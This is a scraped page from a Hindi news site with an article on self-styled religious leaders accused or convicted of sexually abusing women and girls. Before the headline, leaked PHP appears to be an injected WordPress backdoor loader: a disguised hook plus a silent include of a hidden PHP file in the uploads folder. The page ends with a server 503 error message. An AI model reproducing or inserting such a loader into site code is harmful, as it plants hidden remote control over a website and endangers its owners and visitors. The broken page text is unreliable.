add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); जानें धर्म की आड़ में यौन अपराध करने वाले ढोंगी बाबाओं का पूरा काला चिट्ठा – SOCH INDIA
Menu

अपराध समाचार
जानें धर्म की आड़ में यौन अपराध करने वाले ढोंगी बाबाओं का पूरा काला चिट्ठा

nobanner

कभी आध्यात्म तो कभी आस्था की आड़ लेकर ढोंगी बाबा, लड़कियों और महिलाओं का यौन शोषण करते रहे हैं. ऐसे कई मामले सामने भी आ चुके हैं और ऐसे बाबा जेल की सलाखों के पीछे भी पहुंच चुके हैं लेकिन फिर भी ऐसे मामले रुक नहीं रहे हैं. ताजा मामला दिल्ली से है जो बेहद हैरान करने वाला है. चलिए आपको ऐसे कुछ केस बताते हैं जिनको जान कर आप भी सोचने के लिए मजबूर हो जाएंगे.

यूं तो मामले अलग-अलग राज्यों के हैं लेकिन इसकी शुरुआत देश की राजधानी दिल्ली से करते हैं जहां दो दिन पहले ही एक ढोंगी बाबा का भंडाफोड़ हुआ है जो आध्यात्म के नाम पर महिलाओं का यौन शोषण किया करता था.

दिल्ली के रोहिणी इलाके में आध्यात्मिक विश्वविद्यालय के नाम पर लड़कियों का यौन शोषण करने वाले ढोंगी बाबा वीरेंद्र देव दीक्षित भंडाफोड़ हुआ है. पुलिस ने शुक्रवार को लगातार दूसरे दिन वीरेंद्र देव के ठिकाने पर छापेमारी की. दिल्ली महिला आयोग की अध्यक्ष स्वाति मालीवाल ने बताया आश्रम से 41 नाबालिग लड़कियों को निकाला गया. पुलिस ने आश्रम के 14 दरबाजों को तोड़ा है

पिछले दिनों मीडिया की सुर्खियां रहे बलात्कारी बाबा राम रहीम इस मामले के सबसे बड़े उदारण के रूप में याद रखे जाएंगे. हरियाणा के पंचकुला में आध्यात्म और आस्था के नाम पर आश्रम चलाने वाले बलात्कारी बाबा राम रहीम की काली करतूतें पूरी दुनिया के सामने हैं. कोर्ट ने डेरा सच्चा सौदा के प्रमुख बलात्कारी बाबा गुरमीत राम रहीम सिंह को 15 साल पुराने साध्वी रेप केस में 20 साल कैद की सजा सुनाई है. डेरा प्रमुख राम रहीम को बलात्कार के दो मामलों में कुल 20 साल की सजा मिली है. बलात्कारी राम रहीम सिंह पर 30 लाख जुर्माना भी लगाया है.

खुद को बापू कहलाना पसंद करने वाले बलात्कारी बाबा आसाराम भी महिलाओं का यौन शोषण करने के मामले में जेल में बंद हैं. महिलाओं को अपनी हवस का शिकार बनाने वाले बाबा आसाराम का मामला तब सामने आया था जब वे अपने एक भक्त की बेटी का दिमागी इलाज के बहाने जोधपुर के निकट मनाई गांव में एक कमरे में बंद कर उसका यौन शोषण किया. लड़की के पिता ने खुद इसकी शिकायत पुलिस को दी जिसके बाद आसाराम को राजस्थान पुलिस ने बाबा को सलाखों के पीछे धकेल दिया. बता दें कि फिलहाल मामला कोर्ट में है.

इस लिस्ट में 34 साल के एक और स्वयं-भू भगवान स्वामी नित्यानंद का नाम भी है जो एक सेक्स स्कैंडल में शामिल थे. उनके ऊपर तमिल अभिनेत्री रणजीता के साथ यौन गतिविधियों में शामिल होने के आरोप है. तमिलनाडु के थिरुनामलाई के रहने वाले राजशेखर ने 22 साल की उम्र में आध्यात्मिक ज्ञान प्राप्त करने का दावा किया और खुद को नित्यानंद घोषित किया. धीरे-धीरे वो एक बड़े आश्रम के मालिक बन गए.

धर्म और आस्था की आड़ में महिलाओं का यौन शोषण करने वाले बाबाओं में एक नाम इच्छाधारी संत स्वामी भीमानन्द ‘महाराज चित्रकूट वाले’ का भी है. उनके ऊपर भी बड़े पैमाने पर सेक्स रैकेट में शामिल होने का आरोप है. स्वामी के काले करतूतों का भंडाफोड़ तब हुआ जब दक्षिणी दिल्ली में पुलिस ने जाल बिछा कर दो कारों को पकड़ा जिसमें आठ लड़के और दो लड़की पुलिस की पकड़ में आई. पकड़ गए लोगों की जांच में पुलिस को पता चला कि इन में से एक व्यक्ति इच्छाधारी संत स्वामी भीमानन्द है जो कि सेक्स रैकेट चलाता है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.